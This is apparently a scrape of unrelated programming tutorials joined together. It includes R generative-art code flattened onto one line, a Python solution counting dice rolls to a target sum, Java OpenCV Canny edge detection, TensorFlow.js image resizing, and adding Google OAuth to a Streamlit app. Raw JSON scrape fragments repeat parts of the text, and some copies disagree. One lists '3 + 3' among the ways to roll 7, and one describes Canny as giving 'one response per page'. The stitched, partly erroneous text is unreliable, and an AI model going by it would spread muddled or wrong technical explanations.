As we can see from the example of Marcus Volz, the original k-d tree algorithm can be tweaked using even base R:" }, { "code": null, "e": 8026, "s": 5370, "text": "# Metropolis: Generative city visualisations# Packageslibrary(ggart)library(tidyverse)library(tweenr)library(viridis)# Make reproducibleset.seed(10001)# Parametersn <- 10000 # iterationsr <- 75 # neighbourhoodwidth <- 10000 # canvas widthheight <- 10000 # canvas heightdelta <- 2 * pi / 180 # angle direction noisep_branch <- 0.1 # probability of branchinginitial_pts <- 3 # number of initial pointsnframes <- 500 # number of tweenr frames# Initialise data framespoints <- data.frame(x = numeric(n), y = numeric(n), dir = numeric(n), level = integer(n))edges <- data.frame(x = numeric(n), y = numeric(n), xend = numeric(n), yend = numeric(n), level = integer(n))if(initial_pts > 1) { i <- 2 while(i <= initial_pts) { points[i, ] <- c(runif(1, 0, width), runif(1, 0, height), runif(1, -2*pi, 2*pi), 1) i <- i + 1 }}t0 <- Sys.time()# Main loop ----i <- initial_pts + 1while (i <= n) { valid <- FALSE while (!valid) { random_point <- sample_n(points[seq(1:(i-1)), ], 1) # Pick a point at random branch <- ifelse(runif(1, 0, 1) <= p_branch, TRUE, FALSE) alpha <- random_point$dir[1] + runif(1, -(delta), delta) + (branch * (ifelse(runif(1, 0, 1) < 0.5, -1, 1) * pi/2)) v <- c(cos(alpha), sin(alpha)) * r * (1 + 1 / ifelse(branch, random_point$level[1]+1, random_point$level[1])) # Create directional vector xj <- random_point$x[1] + v[1] yj <- random_point$y[1] + v[2] lvl <- random_point$level[1] lvl_new <- ifelse(branch, lvl+1, lvl) if(xj < 0 | xj > width | yj < 0 | yj > height) { next } points_dist <- points %>% mutate(d = sqrt((xj - x)^2 + (yj - y)^2)) if (min(points_dist$d) >= 1 * r) { points[i, ] <- c(xj, yj, alpha, lvl_new) edges[i, ] <- c(xj, yj, random_point$x[1], random_point$y[1], lvl_new) # Add a building if possible buiding <- 1 valid <- TRUE } } i <- i + 1 print(i)}edges <- edges %>% filter(level > 0)sand <- data.frame(alpha = numeric(0), x = numeric(0), y = numeric(0))perp <- data.frame(x = numeric(0), y = numeric(0), xend = numeric(0), yend = numeric(0))# Create plotp2 <- ggplot() + geom_segment(aes(x, y, xend = xend, yend = yend, size = -level), edges, lineend = \"round\") + #geom_segment(aes(x, y, xend = xend, yend = yend), perp, lineend = \"round\", alpha = 0.15) + #geom_point(aes(x, y), points) + #geom_point(aes(x, y), sand, size = 0.05, alpha = 0.05, colour = \"black\") + xlim(0, 10000) + ylim(0, 10000) + coord_equal() + scale_size_continuous(range = c(0.5, 0.5)) + #scale_color_viridis() + theme_blankcanvas(bg_col = \"#fafafa\", margin_cm = 0)# print plotggsave(\"plot007w.png\", p2, width = 20, height = 20, units = \"cm\", dpi = 300)" }, { "code": null, "e": 8150, "s": 8026, "text": "You don’t need to stop here. Some time spent playing with the code can easily end up by creating your distinct wall poster." }, { "code": null, "e": 8283, "s": 8150, "text": "Generative art demonstrates that code can be beautiful. If you are still not persuaded, go and see more elaborated works like these." }, { "code": null, "e": 8597, "s": 8283, "text": "Not only can generative art result in something astonishing, but it also helps you to understand the code itself. Interestingly, getting to the code underlying generative art may not be as easy as with other open-source areas. 
Some “generative artists” conclude not to share the code used in the creative process:" }, { "code": null, "e": 8905, "s": 8597, "text": "“I do not share the code I use to create my pieces. The main reason for this is that I don’t think it would be beneficial to anyone. People interested in getting started with generative art would become to focused on my ideas instead of developing their own. Knowing the answer is the killer of creativity.”" }, { "code": null, "e": 8941, "s": 8905, "text": "Thomas Lin Pedersen, Data Imaginist" }, { "code": null, "e": 9060, "s": 8941, "text": "Regardless if we agree or not, generative art confronts us with ideas that are not that common in the world of coding." }, { "code": null, "e": 9236, "s": 9060, "text": "So, what are your ideas on the matter? Do you have any favourite generative artists? Or maybe your pieces of art you would like to share? Feel free to discuss this on Twitter." } ]
Number of Dice Rolls With Target Sum in Python
Suppose we have d dice, and each die has f faces numbered 1, 2, ..., f. We have to find the number of possible ways (out of f^d total ways), modulo 10^9 + 7, to roll the dice so that the sum of the face-up numbers equals the target. So if the input is d = 2, f = 6, target = 7, then the output will be 6, because with two 6-faced dice there are 6 ways to get the sum 7: 1 + 6, 2 + 5, 3 + 4, 4 + 3, 5 + 2, 6 + 1.

To solve this, we will follow these steps −

m := 1e9 + 7
make a table dp of order d x (t + 1), and fill it with 0
for i in range 0 to d – 1
   for j in range 0 to t
      if i = 0, then dp[i, j] := 1 when j is in range 1 to f, otherwise 0
      otherwise
         for l in range 1 to f
            if j – l > 0, then dp[i, j] := dp[i, j] + dp[i – 1, j - l], and dp[i, j] := dp[i, j] mod m
return dp[d – 1, t] mod m

Let us see the following implementation to get a better understanding −

class Solution(object):
    def numRollsToTarget(self, d, f, t):
        mod = 1000000000 + 7
        dp = [[0 for i in range(t + 1)] for j in range(d)]
        for i in range(d):
            for j in range(t + 1):
                if i == 0:
                    dp[i][j] = 1 if j >= 1 and j <= f else 0
                else:
                    for l in range(1, f + 1):
                        if j - l > 0:
                            dp[i][j] += dp[i - 1][j - l]
                            dp[i][j] %= mod
        return dp[d - 1][t] % mod

ob = Solution()
print(ob.numRollsToTarget(2, 6, 7))

Input
2, 6, 7

Output
6
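A quick way to sanity-check the table-based solution is a top-down (memoized) version of the same recurrence. A minimal sketch, not part of the original article:

from functools import lru_cache

def num_rolls_to_target(d, f, t, mod=10**9 + 7):
    @lru_cache(maxsize=None)
    def ways(dice, total):
        # no dice left: one way if the remaining total is exactly 0
        if dice == 0:
            return 1 if total == 0 else 0
        return sum(ways(dice - 1, total - face)
                   for face in range(1, f + 1) if total - face >= 0) % mod
    return ways(d, t)

print(num_rolls_to_target(2, 6, 7))  # 6, matching the output above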
[ { "code": null, "e": 1496, "s": 1062, "text": "Suppose we have d dice, and each die has f number of faces numbered 1, 2, ..., f. We have to find the number of possible ways (out of fd total ways) modulo 10^9 + 7 to roll the dice so the sum of the face up numbers equal to the target. So if the input is like d = 2, f = 6, target = 7, then the output will be 6. So if we throw each dice with 6 faces, then there are 6 ways to get sum 6, as 1 + 6, 2 + 5, 3 + 3, 4 + 3, 5 + 2, 6 + 1." }, { "code": null, "e": 1540, "s": 1496, "text": "To solve this, we will follow these steps −" }, { "code": null, "e": 1553, "s": 1540, "text": "m := 1e9 + 7" }, { "code": null, "e": 1612, "s": 1553, "text": "make a table dp of order d x (t + 1), and fill this with 0" }, { "code": null, "e": 1842, "s": 1612, "text": "for i in range 0 to d – 1for j in range 0 to tif i = 0, then dp[i, j] := 1 when j in range 1 to f, otherwise 0otherwisefor l in range 1 to fif j – l > 0, then dp[i, j] := dp[i, j] + dp[i – 1, j - l], and dp[i,j] := dp[i, j] mod m" }, { "code": null, "e": 2047, "s": 1842, "text": "for j in range 0 to tif i = 0, then dp[i, j] := 1 when j in range 1 to f, otherwise 0otherwisefor l in range 1 to fif j – l > 0, then dp[i, j] := dp[i, j] + dp[i – 1, j - l], and dp[i,j] := dp[i, j] mod m" }, { "code": null, "e": 2112, "s": 2047, "text": "if i = 0, then dp[i, j] := 1 when j in range 1 to f, otherwise 0" }, { "code": null, "e": 2232, "s": 2112, "text": "otherwisefor l in range 1 to fif j – l > 0, then dp[i, j] := dp[i, j] + dp[i – 1, j - l], and dp[i,j] := dp[i, j] mod m" }, { "code": null, "e": 2343, "s": 2232, "text": "for l in range 1 to fif j – l > 0, then dp[i, j] := dp[i, j] + dp[i – 1, j - l], and dp[i,j] := dp[i, j] mod m" }, { "code": null, "e": 2433, "s": 2343, "text": "if j – l > 0, then dp[i, j] := dp[i, j] + dp[i – 1, j - l], and dp[i,j] := dp[i, j] mod m" }, { "code": null, "e": 2459, "s": 2433, "text": "return dp[d – 1, t] mod m" }, { "code": null, "e": 2529, "s": 2459, "text": "Let us see the following implementation to get better understanding −" }, { "code": null, "e": 2540, "s": 2529, "text": " Live Demo" }, { "code": null, "e": 3057, "s": 2540, "text": "class Solution(object):\n def numRollsToTarget(self, d, f, t):\n mod = 1000000000+7\n dp =[[0 for i in range(t+1)] for j in range(d)]\n for i in range(d):\n for j in range(t+1):\n if i == 0:\n dp[i][j] = 1 if j>=1 and j<=f else 0\n else:\n for l in range(1,f+1):\n if j-l>0:\n dp[i][j]+=dp[i-1][j-l]\n dp[i][j]%=mod\n return dp [d-1][t] % mod\nob = Solution()\nprint(ob.numRollsToTarget(2,6,7))" }, { "code": null, "e": 3063, "s": 3057, "text": "2\n6\n7" }, { "code": null, "e": 3065, "s": 3063, "text": "6" } ]
Java example demonstrating canny edge detection in OpenCV.
The canny edge detector is known as an optimal detector, since it detects only the existing edges, gives only one response per edge, and minimizes the distance between the edge pixels and the detected pixels.

The Canny() method of the Imgproc class applies the canny edge detection algorithm on the given image. This method accepts −

Two Mat objects representing the source and destination images.

Two double variables to hold the threshold values.

To detect the edges of a given image using the canny edge detector −

Read the contents of the source image using the imread() method of the Imgcodecs class.

Convert it into a grayscale image using the cvtColor() method of the Imgproc class.

Blur the resultant (gray) image using the blur() method of the Imgproc class with kernel value 3.

Apply the canny edge detection algorithm on the blurred image using the Canny() method of the Imgproc class.

Create an empty matrix with all values as 0.

Add the detected edges to it using the copyTo() method of the Mat class.

import java.awt.Image;
import java.awt.image.BufferedImage;
import java.io.IOException;
import javafx.application.Application;
import javafx.embed.swing.SwingFXUtils;
import javafx.scene.Group;
import javafx.scene.Scene;
import javafx.scene.image.ImageView;
import javafx.scene.image.WritableImage;
import javafx.stage.Stage;
import org.opencv.core.Core;
import org.opencv.core.Mat;
import org.opencv.core.Scalar;
import org.opencv.core.Size;
import org.opencv.highgui.HighGui;
import org.opencv.imgcodecs.Imgcodecs;
import org.opencv.imgproc.Imgproc;
public class EdgeDetection extends Application {
   public void start(Stage stage) throws IOException {
      //Loading the OpenCV core library
      System.loadLibrary(Core.NATIVE_LIBRARY_NAME);
      String file = "D:\\Images\\win2.jpg";
      Mat src = Imgcodecs.imread(file);
      //Creating empty matrices to store the gray image, edges and destination
      Mat gray = new Mat(src.rows(), src.cols(), src.type());
      Mat edges = new Mat(src.rows(), src.cols(), src.type());
      Mat dst = new Mat(src.rows(), src.cols(), src.type(), new Scalar(0));
      //Converting the image to gray
      Imgproc.cvtColor(src, gray, Imgproc.COLOR_RGB2GRAY);
      //Blurring the image
      Imgproc.blur(gray, edges, new Size(3, 3));
      //Detecting the edges
      Imgproc.Canny(edges, edges, 100, 100*3);
      //Copying the detected edges to the destination matrix
      src.copyTo(dst, edges);
      //Converting matrix to JavaFX writable image
      Image img = HighGui.toBufferedImage(dst);
      WritableImage writableImage = SwingFXUtils.toFXImage((BufferedImage) img, null);
      //Setting the image view
      ImageView imageView = new ImageView(writableImage);
      imageView.setX(10);
      imageView.setY(10);
      imageView.setFitWidth(575);
      imageView.setPreserveRatio(true);
      //Setting the Scene object
      Group root = new Group(imageView);
      Scene scene = new Scene(root, 595, 400);
      stage.setTitle("Canny Edge Detection Example");
      stage.setScene(scene);
      stage.show();
   }
   public static void main(String args[]) {
      launch(args);
   }
}

On executing, the above program displays a window containing the detected edges of the input image.
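The same pipeline can be written very compactly with OpenCV's Python bindings. A minimal sketch (the file path is a placeholder, and the opencv-python package is assumed to be installed):

import cv2

src = cv2.imread("win2.jpg")                  # placeholder path
gray = cv2.cvtColor(src, cv2.COLOR_BGR2GRAY)  # convert to grayscale
blurred = cv2.blur(gray, (3, 3))              # 3x3 box blur
edges = cv2.Canny(blurred, 100, 100 * 3)      # same thresholds as above
dst = cv2.bitwise_and(src, src, mask=edges)   # keep source pixels only where edges were found
cv2.imwrite("edges.png", dst)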
[ { "code": null, "e": 1262, "s": 1062, "text": "The canny edge detector is known as optimal detector since it detects only the existing edges, gives only one response per page and minimizes the distance\nbetween the edge pixels and detected pixels." }, { "code": null, "e": 1387, "s": 1262, "text": "The Canny() method of the Imgproc class applies the canny edge detection algorithm on the given image. this method accepts −" }, { "code": null, "e": 1451, "s": 1387, "text": "Two Mat objects representing the source and destination images." }, { "code": null, "e": 1515, "s": 1451, "text": "Two Mat objects representing the source and destination images." }, { "code": null, "e": 1566, "s": 1515, "text": "Two double variables to hold the threshold values." }, { "code": null, "e": 1617, "s": 1566, "text": "Two double variables to hold the threshold values." }, { "code": null, "e": 1686, "s": 1617, "text": "To detect the edges of a given image using the canny edge detector −" }, { "code": null, "e": 1774, "s": 1686, "text": "Read the contents of the source image using the imread() method of the Imgcodecs class." }, { "code": null, "e": 1862, "s": 1774, "text": "Read the contents of the source image using the imread() method of the Imgcodecs class." }, { "code": null, "e": 1947, "s": 1862, "text": "Convert it into a gray scale image using the cvtColor() method of the Imgproc class." }, { "code": null, "e": 2032, "s": 1947, "text": "Convert it into a gray scale image using the cvtColor() method of the Imgproc class." }, { "code": null, "e": 2130, "s": 2032, "text": "Blur the resultant (gray) image using the blur() method of the Imgproc class with kernel value 3." }, { "code": null, "e": 2228, "s": 2130, "text": "Blur the resultant (gray) image using the blur() method of the Imgproc class with kernel value 3." }, { "code": null, "e": 2327, "s": 2228, "text": "Apply canny edge detection algorithm on the blurred image using the canny() method of the Imgproc." }, { "code": null, "e": 2426, "s": 2327, "text": "Apply canny edge detection algorithm on the blurred image using the canny() method of the Imgproc." }, { "code": null, "e": 2471, "s": 2426, "text": "Create an empty matrix with all values as 0." }, { "code": null, "e": 2516, "s": 2471, "text": "Create an empty matrix with all values as 0." }, { "code": null, "e": 2589, "s": 2516, "text": "Add the detected edges to it using the copyTo() method of the Mat class." }, { "code": null, "e": 2662, "s": 2589, "text": "Add the detected edges to it using the copyTo() method of the Mat class." 
}, { "code": null, "e": 4804, "s": 2662, "text": "import java.awt.Image;\nimport java.awt.image.BufferedImage;\nimport java.io.IOException;\nimport javafx.application.Application;\nimport javafx.embed.swing.SwingFXUtils;\nimport javafx.scene.Group;\nimport javafx.scene.Scene;\nimport javafx.scene.image.ImageView;\nimport javafx.scene.image.WritableImage;\nimport javafx.stage.Stage;\nimport org.opencv.core.Core;\nimport org.opencv.core.Mat;\nimport org.opencv.core.Scalar;\nimport org.opencv.core.Size;\nimport org.opencv.highgui.HighGui;\nimport org.opencv.imgcodecs.Imgcodecs;\nimport org.opencv.imgproc.Imgproc;\npublic class EdgeDetection extends Application {\n public void start(Stage stage) throws IOException {\n //Loading the OpenCV core library\n System.loadLibrary( Core.NATIVE_LIBRARY_NAME );\n String file =\"D:\\\\Images\\\\win2.jpg\";\n Mat src = Imgcodecs.imread(file);\n //Creating an empty matrices to store edges, source, destination\n Mat gray = new Mat(src.rows(), src.cols(), src.type());\n Mat edges = new Mat(src.rows(), src.cols(), src.type());\n Mat dst = new Mat(src.rows(), src.cols(), src.type(), new Scalar(0));\n //Converting the image to Gray\n Imgproc.cvtColor(src, gray, Imgproc.COLOR_RGB2GRAY);\n //Blurring the image\n Imgproc.blur(gray, edges, new Size(3, 3));\n //Detecting the edges\n Imgproc.Canny(edges, edges, 100, 100*3);\n //Copying the detected edges to the destination matrix\n src.copyTo(dst, edges); \n //Converting matrix to JavaFX writable image\n Image img = HighGui.toBufferedImage(dst);\n WritableImage writableImage= SwingFXUtils.toFXImage((BufferedImage) img, null);\n //Setting the image view\n ImageView imageView = new ImageView(writableImage);\n imageView.setX(10);\n imageView.setY(10);\n imageView.setFitWidth(575);\n imageView.setPreserveRatio(true);\n //Setting the Scene object\n Group root = new Group(imageView);\n Scene scene = new Scene(root, 595, 400);\n stage.setTitle(\"Gaussian Blur Example\");\n stage.setScene(scene);\n stage.show();\n }\n public static void main(String args[]) {\n launch(args);\n }\n}" }, { "code": null, "e": 4860, "s": 4804, "text": "On executing, the above produces the following output −" } ]
Tensorflow.js tf.image.resizeBilinear() Function - GeeksforGeeks
28 Jul, 2021

Tensorflow.js is an open-source library developed by Google for running machine learning models as well as deep learning neural networks in the browser or Node.js environment.

The .image.resizeBilinear() function is used to bilinearly rescale a single 3D image, or a batch of 3D images, to a new configuration.

Syntax:

tf.image.resizeBilinear(images, size, alignCorners?, halfPixelCenters?)

Parameters:

images: The stated images of rank 4 or rank 3, with configuration [batch, height, width, inChannels]. If of rank 3, a batch of one is assumed. It can be of type tf.Tensor3D, tf.Tensor4D, TypedArray, or Array.
size: The new configuration [newHeight, newWidth] to which the images are rescaled. Every channel is rescaled independently. It is of type [number, number].
alignCorners: An optional parameter whose default value is false. If true, the input is resized by (new_height - 1) / (height - 1), which exactly aligns the four corners of the stated images and the rescaled images. If false, it is rescaled by new_height / height. The width dimension is treated the same way. It is of type Boolean.
halfPixelCenters: An optional parameter whose default value is false. It is of type Boolean.

Return Value: It returns tf.Tensor3D or tf.Tensor4D.

Example 1: In this example, we are going to use a 4D tensor and a size parameter inside the tf.image.resizeBilinear() function.

Javascript

// Importing the tensorflow.js library
import * as tf from "@tensorflow/tfjs"

// Calling the image.resizeBilinear() method and
// printing the output
tf.image.resizeBilinear(tf.tensor4d([[
    [[4, 7], [21, 9]],
    [[8, 9], [1, 33]]
]]), [3, 4]).print();

Output:

Tensor
    [[[[4        , 7        ],
       [12.5     , 8        ],
       [21       , 9        ],
       [21       , 9        ]],

      [[6.666667 , 8.333333 ],
       [7.1666665, 16.666666],
       [7.666666 , 25       ],
       [7.666666 , 25       ]],

      [[8        , 9        ],
       [4.5      , 21       ],
       [1        , 33       ],
       [1        , 33       ]]]]

Example 2: In this example, we are going to use an array of floats, alignCorners, as well as halfPixelCenters.

Javascript

// Importing the tensorflow.js library
import * as tf from "@tensorflow/tfjs"

// Defining an array of floats
const arr = [[
    [[1.1, 1.7, 1.5, 1.1], [1.7, 1.9, 8.1, 6.3]],
    [[3.3, 3.4, 3.7, 4.0], [5.1, 5.2, 5.3, 5.9]]
]];

// Calling the image.resizeBilinear() method and
// printing the output
tf.image.resizeBilinear(arr, [1, 2], true, false).print();

Output:

Tensor
    [[[[1.1, 1.7, 1.5      , 1.1      ],
       [1.7, 1.9, 8.1000004, 6.3000002]]]]

Reference: https://js.tensorflow.org/api/latest/#image.resizeBilinear
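To see where output values such as 12.5 and 6.666667 in Example 1 come from, here is a small NumPy reimplementation of the default resize convention (alignCorners and halfPixelCenters both false, so a source coordinate is output index * input_size / output_size). This is an illustrative sketch written for this article, not TensorFlow.js code:

import numpy as np

def resize_bilinear(img, new_h, new_w):
    # img has shape (height, width, channels); default convention:
    # source coordinate = output index * (input size / output size)
    h, w, c = img.shape
    out = np.zeros((new_h, new_w, c), dtype=np.float32)
    for oy in range(new_h):
        for ox in range(new_w):
            y, x = oy * h / new_h, ox * w / new_w
            y0, x0 = int(y), int(x)
            y1, x1 = min(y0 + 1, h - 1), min(x0 + 1, w - 1)
            dy, dx = y - y0, x - x0
            # interpolate horizontally on the two rows, then vertically
            top = img[y0, x0] * (1 - dx) + img[y0, x1] * dx
            bottom = img[y1, x0] * (1 - dx) + img[y1, x1] * dx
            out[oy, ox] = top * (1 - dy) + bottom * dy
    return out

img = np.array([[[4, 7], [21, 9]],
                [[8, 9], [1, 33]]], dtype=np.float32)
print(resize_bilinear(img, 3, 4))  # row 0: [4, 7], [12.5, 8], [21, 9], [21, 9]

For instance, the output column at index 1 maps to source x = 1 * 2/4 = 0.5, halfway between 4 and 21, which gives 12.5.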
[ { "code": null, "e": 24909, "s": 24881, "text": "\n28 Jul, 2021" }, { "code": null, "e": 25082, "s": 24909, "text": "Tensorflow.js is an open-source library developed by Google for running machine learning models as well as deep learning neural networks in the browser or node environment." }, { "code": null, "e": 25230, "s": 25082, "text": "The .image.resizeBilinear() function is used to bilinearly rescale an individual 3D image or else a heap of 3D images to a different configuration." }, { "code": null, "e": 25238, "s": 25230, "text": "Syntax:" }, { "code": null, "e": 25310, "s": 25238, "text": "tf.image.resizeBilinear(images, size, alignCorners?, halfPixelCenters?)" }, { "code": null, "e": 25324, "s": 25310, "text": "Parameters: " }, { "code": null, "e": 25572, "s": 25324, "text": "images: The stated images of rank 4 or else rank 3, which is of configuration [batch, height, width, inChannels]. Moreover, in case its of rank 3, then the batch of one is presumed. It can be of type tf.Tensor3D, tf.Tensor4D, TypedArray, or Array." }, { "code": null, "e": 25737, "s": 25572, "text": "size: The different stated configuration [newHeight, newWidth] in order to rescale the images. Every channel is rescaled one by one. It is of type [number, number]." }, { "code": null, "e": 26124, "s": 25737, "text": "alignCorners: It is the optional parameter whose by default value is false. In case its true, the the input is resized by (new_height – 1) / (height – 1), that absolutely queues the four corners of the stated images as well as rescaled images. However, if its false then it is rescaled by new_height / height. It deals in the same manner with the width dimension. It is of type Boolean." }, { "code": null, "e": 26227, "s": 26124, "text": "halfPixelCenters: It is the optional parameter whose by default value is false. It is of type Boolean." }, { "code": null, "e": 26281, "s": 26227, "text": "Return Value: It returns tf.Tensor3D, or tf.Tensor4D." }, { "code": null, "e": 26405, "s": 26281, "text": "Example 1: In this example, we are going to use a 4d tensor and a size parameter inside tf.image.resizeBilinear() function." }, { "code": null, "e": 26416, "s": 26405, "text": "Javascript" }, { "code": "// Importing the tensorflow.js libraryimport * as tf from \"@tensorflow/tfjs\" // Calling image.resizeBilinear() method and// Printing outputtf.image.resizeBilinear(tf.tensor4d([[ [[4, 7], [21, 9]], [[8, 9], [1, 33]] ]]), [3, 4]).print();", "e": 26661, "s": 26416, "text": null }, { "code": null, "e": 26669, "s": 26661, "text": "Output:" }, { "code": null, "e": 27054, "s": 26669, "text": "Tensor\n [[[[4 , 7 ],\n [12.5 , 8 ],\n [21 , 9 ],\n [21 , 9 ]],\n\n [[6.666667 , 8.333333 ],\n [7.1666665, 16.666666],\n [7.666666 , 25 ],\n [7.666666 , 25 ]],\n\n [[8 , 9 ],\n [4.5 , 21 ],\n [1 , 33 ],\n [1 , 33 ]]]]" }, { "code": null, "e": 27166, "s": 27054, "text": "Example 2: In this example, we are going to use an array of floats, alignCorners, as well as halfPixelCenters." 
}, { "code": null, "e": 27177, "s": 27166, "text": "Javascript" }, { "code": "// Importing the tensorflow.js libraryimport * as tf from \"@tensorflow/tfjs\" // Defining an array of floatsconst arr = [[ [[1.1, 1.7, 1.5, 1.1], [1.7, 1.9, 8.1, 6.3]], [[3.3, 3.4, 3.7, 4.0], [5.1, 5.2, 5.3, 5.9]] ]]; // Calling image.resizeBilinear() method and// Printing outputtf.image.resizeBilinear(arr, [1, 2], true, false).print();", "e": 27526, "s": 27177, "text": null }, { "code": null, "e": 27534, "s": 27526, "text": "Output:" }, { "code": null, "e": 27625, "s": 27534, "text": "Tensor\n [[[[1.1, 1.7, 1.5 , 1.1 ],\n [1.7, 1.9, 8.1000004, 6.3000002]]]]" }, { "code": null, "e": 27695, "s": 27625, "text": "Reference: https://js.tensorflow.org/api/latest/#image.resizeBilinear" }, { "code": null, "e": 27702, "s": 27695, "text": "Picked" }, { "code": null, "e": 27716, "s": 27702, "text": "Tensorflow.js" }, { "code": null, "e": 27727, "s": 27716, "text": "JavaScript" }, { "code": null, "e": 27744, "s": 27727, "text": "Web Technologies" }, { "code": null, "e": 27842, "s": 27744, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 27851, "s": 27842, "text": "Comments" }, { "code": null, "e": 27864, "s": 27851, "text": "Old Comments" }, { "code": null, "e": 27925, "s": 27864, "text": "Difference between var, let and const keywords in JavaScript" }, { "code": null, "e": 27966, "s": 27925, "text": "Difference Between PUT and PATCH Request" }, { "code": null, "e": 28006, "s": 27966, "text": "Remove elements from a JavaScript Array" }, { "code": null, "e": 28060, "s": 28006, "text": "How to get character array from string in JavaScript?" }, { "code": null, "e": 28122, "s": 28060, "text": "How to get selected value in dropdown list using JavaScript ?" }, { "code": null, "e": 28178, "s": 28122, "text": "Top 10 Front End Developer Skills That You Need in 2022" }, { "code": null, "e": 28211, "s": 28178, "text": "Installation of Node.js on Linux" }, { "code": null, "e": 28273, "s": 28211, "text": "Top 10 Projects For Beginners To Practice HTML and CSS Skills" }, { "code": null, "e": 28316, "s": 28273, "text": "How to fetch data from an API in ReactJS ?" } ]
Implementing Google OAuth in Streamlit | by Duc Anh Bui | Towards Data Science
At HousingAnywhere, we often utilize Streamlit to build interactive dashboards for our metrics and targets. Streamlit is a relatively new tool. It has a lot of potential use cases and is very easy to use, but it can be lacking in some areas such as security. A popular, simple security method most people use for Streamlit is SessionState, but it is very susceptible to attacks (e.g. brute forcing).

In this article, I'll show you how to implement Google OAuth 2.0 to better secure your application.

First, let's configure the OAuth consent screen.

1. Go to the Google API Console OAuth consent screen page.
2. Choose Internal so only users within your organization can access the app.
3. Fill in the necessary information.
4. Click Add Scopes and add any necessary scopes you require. For this example, we don't need any.

Next, we need to create an authorization credential from GCP:

1. Go to the Credentials page in GCP Console.
2. Click on Create Credentials > OAuth client ID.
3. Select Web Application for Application type and fill in the name for your client.
4. Fill in redirect URIs for your application. These are the links you want the users to be redirected back to after logging in. For example, in a local environment, you can use http://localhost:8501
5. Note down the Client ID and Client Secret for later.

Install the following libraries:

streamlit==0.81.1
httpx-oauth==0.3.5

We'll utilize SessionState to store the token returned from the Google API. Store this in a session_state.py (a minimal stand-in for this helper is sketched at the end of this section).

In the main application, we first import what we need and define these three variables to store the Client ID and Secret from earlier:

import os
import asyncio
import streamlit as st
from httpx_oauth.clients.google import GoogleOAuth2

client_id = os.environ['GOOGLE_CLIENT_ID']
client_secret = os.environ['GOOGLE_CLIENT_SECRET']
redirect_uri = os.environ['REDIRECT_URI']

We'll be using httpx-oauth as our authorization client:

client = GoogleOAuth2(client_id, client_secret)

Now, create a function that handles creating the authorization URL:

async def write_authorization_url(client, redirect_uri):
    authorization_url = await client.get_authorization_url(
        redirect_uri,
        scope=["email"],
        extras_params={"access_type": "offline"},
    )
    return authorization_url

authorization_url = asyncio.run(
    write_authorization_url(client=client, redirect_uri=redirect_uri)
)

st.write(f'''<h1>
    Please login using this <a target="_self"
    href="{authorization_url}">url</a></h1>''',
    unsafe_allow_html=True)

Once the user gets redirected back from the Google authorization page, the authorization code is contained in the URL.
We'll obtain it using st.experimental_get_query_params():

code = st.experimental_get_query_params()['code']

And get the token from Google with this function:

async def write_access_token(client, redirect_uri, code):
    token = await client.get_access_token(code, redirect_uri)
    return token

token = asyncio.run(
    write_access_token(client=client, redirect_uri=redirect_uri, code=code)
)

session_state.token = token

To summarize the flow: the user logs in via the authorization URL, Google redirects back with a code, and we exchange that code for a token.

We store the token using the SessionState utility so that the user does not need to re-authorize during a session. Since we're storing the token per session, refreshing the page will trigger the authorization process again.

Securing your data is a crucial aspect of building data applications. With Google OAuth, you can sleep a little better at night knowing that your application is better secured against a possible breach.

You can check out the code for the whole application here on GitHub.
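For reference, here is a minimal stand-in for the session_state.py helper referenced earlier. It only mimics the interface the article relies on (an object whose attributes, such as session_state.token, can be read and written); the widely shared original gist achieves true per-session persistence by hooking into Streamlit's server internals, and on Streamlit 0.84+ you can simply use the built-in st.session_state instead.

# session_state.py -- a minimal stand-in, not the original gist
class SessionState:
    def __init__(self, **kwargs):
        # seed initial attributes, e.g. SessionState(token=None)
        for key, value in kwargs.items():
            setattr(self, key, value)

# usage in the main app (illustrative):
# session_state = SessionState(token=None)
# if session_state.token is None:
#     ...run the OAuth flow above and set session_state.token...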
[ { "code": null, "e": 583, "s": 172, "text": "At HousingAnywhere, we often utilize Streamlit to build interactive dashboards for our metrics and targets. Streamlit is a relatively new tool. It has a lot of potential use cases and is very easy to use but can be lacking in some areas such as security. A popular, simple method for security most people use for Streamlit is to utilise SessionState, but it is very susceptible to attacks (e.g. brute forcing)." }, { "code": null, "e": 683, "s": 583, "text": "In this article, I’ll show you how to implement Google OAuth 2.0 to better secure your application." }, { "code": null, "e": 732, "s": 683, "text": "First, let’s configure the OAuth consent screen." }, { "code": null, "e": 991, "s": 732, "text": "Go to the Google API Console OAuth consent screen page.Choose Internal so only users within your organization can access the app.Fill in the necessary information.Click Add Scopes and add any necessary scopes you require. For this example, we don’t need any." }, { "code": null, "e": 1047, "s": 991, "text": "Go to the Google API Console OAuth consent screen page." }, { "code": null, "e": 1122, "s": 1047, "text": "Choose Internal so only users within your organization can access the app." }, { "code": null, "e": 1157, "s": 1122, "text": "Fill in the necessary information." }, { "code": null, "e": 1253, "s": 1157, "text": "Click Add Scopes and add any necessary scopes you require. For this example, we don’t need any." }, { "code": null, "e": 1315, "s": 1253, "text": "Next, we need to create an authorization credential from GCP:" }, { "code": null, "e": 1730, "s": 1315, "text": "Go to the Credentials page in GCP ConsoleClick on Create Credentials > OAuth client ID.Select Web Application for Application type and fill in the name for your client.Fill in redirect URIs for your application. These are the links you want the users to be redirected back to after logging in. For example, in local environment, you can use http://localhost:8501Note down the Client ID and Client Secret for later." }, { "code": null, "e": 1772, "s": 1730, "text": "Go to the Credentials page in GCP Console" }, { "code": null, "e": 1819, "s": 1772, "text": "Click on Create Credentials > OAuth client ID." }, { "code": null, "e": 1901, "s": 1819, "text": "Select Web Application for Application type and fill in the name for your client." }, { "code": null, "e": 2096, "s": 1901, "text": "Fill in redirect URIs for your application. These are the links you want the users to be redirected back to after logging in. For example, in local environment, you can use http://localhost:8501" }, { "code": null, "e": 2149, "s": 2096, "text": "Note down the Client ID and Client Secret for later." }, { "code": null, "e": 2181, "s": 2149, "text": "Install the following libraries" }, { "code": null, "e": 2217, "s": 2181, "text": "streamlit==0.81.1httpx-oauth==0.3.5" }, { "code": null, "e": 2324, "s": 2217, "text": "We’ll utilize SessionState to store the token returned from Google API. 
